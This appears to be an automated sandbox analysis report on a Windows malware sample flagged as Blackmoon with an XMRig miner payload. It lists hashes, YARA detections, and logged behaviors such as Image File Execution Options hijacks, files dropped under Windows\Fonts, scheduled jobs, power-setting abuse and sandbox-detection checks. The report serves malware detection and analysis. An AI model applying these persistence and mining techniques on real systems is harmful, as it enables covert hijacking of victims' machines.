Analysis
-
max time kernel
71s -
max time network
124s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
24-11-2024 04:05
Behavioral task
behavioral1
Sample
ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe
Resource
win10v2004-20241007-en
General
-
Target
ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe
-
Size
5.0MB
-
MD5
f45ef44f86e756b76afe151ef9c630f4
-
SHA1
de16feb362b62382590e21f723dba440721f4e6f
-
SHA256
ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037
-
SHA512
773e1202d6164489096fec60f7e0d1b88fff8bcadc12df6a7011b896dffd43c2ffd2b5e377697ecab2fd52f978cc84fd950d76ff41bc797062833b7b3bbe2be0
-
SSDEEP
98304:mfgwpJXZdLmpdT2pVWLncQC0ofccWg1uMb3XmcTYmRKl8fgwpJXZdLmpdT2pVWLj:6HpzdwIWLYc41uaTZZHpzdwIWLYc41uD
Malware Config
Signatures
-
Blackmoon family
-
Detect Blackmoon payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3660-4-0x0000000000400000-0x0000000000695000-memory.dmp family_blackmoon behavioral2/memory/4316-11-0x0000000000400000-0x0000000000695000-memory.dmp family_blackmoon behavioral2/memory/2900-440-0x0000000000400000-0x0000000000695000-memory.dmp family_blackmoon -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 3656 created 2000 3656 WerFault.exe svchost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
powershell.EXEsvchost.exepowershell.EXEdescription pid process target process PID 3340 created 612 3340 powershell.EXE winlogon.exe PID 5096 created 2000 5096 svchost.exe svchost.exe PID 1416 created 612 1416 powershell.EXE winlogon.exe -
Xmrig family
-
XMRig Miner payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/1612-688-0x00007FF7EDBD0000-0x00007FF7EE1EF000-memory.dmp xmrig -
Drops file in Drivers directory 1 IoCs
Processes:
ulmad.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts ulmad.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 4 IoCs
Processes:
ulmad.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "svchost.exe" ulmad.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe ulmad.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "svchost.exe" ulmad.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe ulmad.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe -
Executes dropped EXE 4 IoCs
Processes:
ulmad.exeulmad.exevodije.exeemmwdz.exepid process 4316 ulmad.exe 2900 ulmad.exe 3216 vodije.exe 1612 emmwdz.exe -
Processes:
powershell.EXEpowershell.EXEpid process 3340 powershell.EXE 1416 powershell.EXE -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
-
Power Settings 1 TTPs 8 IoCs
powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.
Processes:
cmd.execmd.exepowercfg.execmd.exepowercfg.execmd.execmd.exepowercfg.exepid process 1128 cmd.exe 2204 cmd.exe 2756 powercfg.exe 1108 cmd.exe 2704 powercfg.exe 4204 cmd.exe 4140 cmd.exe 3276 powercfg.exe -
Drops file in System32 directory 22 IoCs
Processes:
svchost.exesvchost.exeulmad.exepowershell.EXEOfficeClickToRun.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies ulmad.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 ulmad.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE ulmad.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 ulmad.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\System32\Tasks\jzevcefb svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 3340 set thread context of 3540 3340 powershell.EXE dllhost.exe PID 1416 set thread context of 5072 1416 powershell.EXE dllhost.exe -
Processes:
resource yara_rule behavioral2/memory/3660-0-0x0000000000400000-0x0000000000695000-memory.dmp upx behavioral2/memory/3660-4-0x0000000000400000-0x0000000000695000-memory.dmp upx C:\Windows\Fonts\upaxef\ulmad.exe upx behavioral2/memory/4316-11-0x0000000000400000-0x0000000000695000-memory.dmp upx behavioral2/memory/2900-440-0x0000000000400000-0x0000000000695000-memory.dmp upx C:\Windows\Fonts\hfedugey\emmwdz.exe upx behavioral2/memory/1612-680-0x00007FF7EDBD0000-0x00007FF7EE1EF000-memory.dmp upx behavioral2/memory/1612-688-0x00007FF7EDBD0000-0x00007FF7EE1EF000-memory.dmp upx -
Drops file in Windows directory 25 IoCs
Processes:
TiWorker.exevodije.exeWerFault.exesvchost.exeulmad.exesvchost.exeef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exeemmwdz.exedescription ioc process File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe File created C:\Windows\Tasks\$xuxqcmogbuaoxxmz.job vodije.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\SystemCertificates WerFault.exe File opened for modification C:\Windows\ServiceState\WinHttpAutoProxySvc\Data\cachev3.dat svchost.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs WerFault.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead WerFault.exe File opened for modification \??\c:\windows\ime\sdlibwve\bwicdl.exe ulmad.exe File created \??\c:\windows\fonts\upaxef\BestPower.pow ulmad.exe File created \??\c:\windows\fonts\hfedugey\emmwdz.exe ulmad.exe File opened for modification \??\c:\windows\fonts\hfedugey\emmwdz.exe ulmad.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\SystemCertificates\My WerFault.exe File opened for modification C:\Windows\Tasks\$xuxqcmogbuaoxxmz.job vodije.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs WerFault.exe File created \??\c:\windows\ime\sdlibwve\bwicdl.exe ulmad.exe File opened for modification C:\Windows\ServiceState\EventLog\Data\lastalive0.dat svchost.exe File created \??\c:\windows\fonts\upaxef\ulmad.exe ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe File created \??\c:\windows\fonts\hfedugey\config.json ulmad.exe File created C:\Windows\Tasks\$xuxqcmoghmnwfoaj.job vodije.exe File opened for modification C:\Windows\Tasks\$xuxqcmoghmnwfoaj.job vodije.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates WerFault.exe File created \??\c:\windows\fonts\upaxef\HighPower.pow ulmad.exe File opened for modification \??\c:\windows\fonts\hfedugey\config.json emmwdz.exe File opened for modification \??\c:\windows\fonts\upaxef\ulmad.exe ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe File created \??\c:\windows\fonts\vyayehhu\oyajnuf.exe ulmad.exe File created \??\c:\windows\fonts\hfedugey\WinRing0x64.sys ulmad.exe -
System Location Discovery: System Language Discovery 1 TTPs 28 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.execmd.exevodije.exePING.EXEWMIC.execmd.execmd.execmd.exeWMIC.exeulmad.exeWMIC.exeWMIC.exepowercfg.exepowershell.EXEschtasks.exeWMIC.exeschtasks.exedllhost.execmd.execmd.execmd.execmd.exepowercfg.execmd.exeef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exeulmad.execmd.exeWMIC.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vodije.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ulmad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powercfg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ef1050c92d8b2053fc88be90d527a7fb73e76a32b16cbdd8dcb2f429b6c4f037.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ulmad.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEcmd.exepid process 848 PING.EXE 2300 cmd.exe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exemousocoreworker.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
WerFault.exemousocoreworker.exewmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEmousocoreworker.exesvchost.exeOfficeClickToRun.exepowershell.EXEsvchost.exeulmad.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "00180011DE87A725" mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={028F791C-9EDF-47B3-B697-8CBCC2DA956D}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\SignalManager\Peek mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d976ac2283a19d4e9f4d3ff13c895994000000000200000000001066000000010000200000002ed7d80520d3d5f1020d0becccb6e2a0e60c38767902a58192f0ea79a7cccd4a000000000e800000000200002000000054405fb8bd499e59187f08c56c84610cb9a444c3043936961680ccb63e0eb6ddb0030000d9d457e5effec652e0fab4f9cc381ff91a9755411405a22e96bbd79ed35a6ccae74d56439bd501046de12a87ee54e47cc19b2359fb30493a666e4db332f7a417cd13f905070b9842492d9ef423744c8578edaafc9b2d9e8a928a76cbbb1d2b2ba30189b408f941e3ef4bf52b9e38686221469ec6207893e0e06a6a7628ab192855470126c66c5c803004dae41b5cb16901394a07eed3ee547b643df01c13c2908d31d66e83172a35d11642227156430ef3304ea4896e8300ba273686a190672c525f91572182b2faf64f2f386f4b5cbe2465b3b8993a3a8a6de9cf10b4bd86c2518b1265bfccd106f6192186096c04a19ea2c7dc8c090fbf259e13dd5152c66e4a4b2fdf5052eb5a1564f4d822f61518a0fbc5948c0d020e54c728e36698b7d635d049e489c9a5628ea36702d7107c2308386be0110190f08be0a0e3cdb86d10f93e384ddbc35a8ab04adf3e72d944953f6851878641f06b43dd494b54b0b803bae22bb3f4c9deba4be350b7622cdbe2234dbc72879061a8217689b9c3ea1fe9b167cae91e9802c19443935f69f421f5a15ac2f4335fe57743791c270f59ade42a3dfcd5f4ae8437103e571b7d12209f65262f4dae4683912ca6376e61bf90be53fc782bac721bb583605850d4470c8bf5c59c0ade449065a82e2758e4ca13d9c2c4d7514d255ae4eee670157e05790b8ac3284c901eb1f8e71b3a09fcb484ab8bc75f64792faa2c9594491339b6065136691371096a3af199afab798927c932edcd934ad6754098a003fc47a4aab34236ffaff6a0d0019f9f3be2345230ab53626dfc4e1711ecca4548d889232f3af9f18196285bb4ff4764d87e056317167d23018b70db6df3d1be897756d91d1c65c265be60363733b4ab722f971ce0cf3db0b6ffd71f0bc89cfad39e1287b09ae5d5b1a215aac8133b023abfd6f678470f822344306b4a01b68cff4c2256fea7dd69581f1774097336f333b0b74a1f83eede5fc312017168a5e4f206f0a9aa54755019297e658e8b817fea5cbcb2fdcf209e225436e75ee091096c2846c89fd3f2f1ee72f981a3bce7bc2d912f2863708fb1c647ea2ec530fcea8017215358e47adf4a8e3a63d47a3ab80d950693cff48635d18b873761d329b7dbc29a4da255611931c1f47827a681ea6f8d7b30c694a129c15abdce7ac449ce766822150136759ffa58acdd85f10cb6823d92a5fc12a17ae081393facb6c71fc188852efe54c6cac786bbe42efe117cb7b06ac1acff3b08e9593e4fa570763c6e5c25edeaa0098d59d74ddd84139283751e9fa01094f56de6e6c715e2684f73f6c250c804328940000000f6e13dfbc5ccab8b299b8768417441ed0410746d3a566c815d0193b40f6a05b36a884fe56d9f044e7b3704b72fe40b599b05ebe4fc2d99e25c4f3c05e727a50d mousocoreworker.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0e-d7-c6-d0-f6-eb svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Set value (int) 